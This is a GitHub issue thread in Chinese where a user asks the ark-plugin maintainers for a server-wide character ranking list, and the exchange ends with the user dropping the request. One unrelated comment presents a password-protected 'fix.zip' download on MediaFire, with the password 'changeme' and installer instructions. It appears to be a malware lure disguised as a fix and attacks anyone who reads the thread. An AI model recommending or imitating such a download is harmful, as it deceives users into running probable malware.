### ISSUE TITLE
可以加一个角色的全服排行列表吗

### ISSUE THREAD

**Issue by yousa-love** [NotIvny/ark-plugin#11]
类似于这个群内排行，可以看某角色的全服前30名排行
![Uploading 7dd59f8aa70e7573eb3fe940db1f26c3.jpg…]()

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NotIvny** [comment]
![5a9b9e43110da3bcf7450fcdc4093eb0](https://github.com/user-attachments/assets/8aa237b4-0133-43ec-b123-286a761de3d8)
上传不了的话发图床

**Comment by yousa-love** [comment]
我指的就是全服的*流萤排行。所以这个排名不是机器人本地储存uid的排行而是联网的全服排行吗？那就算了，谢谢。
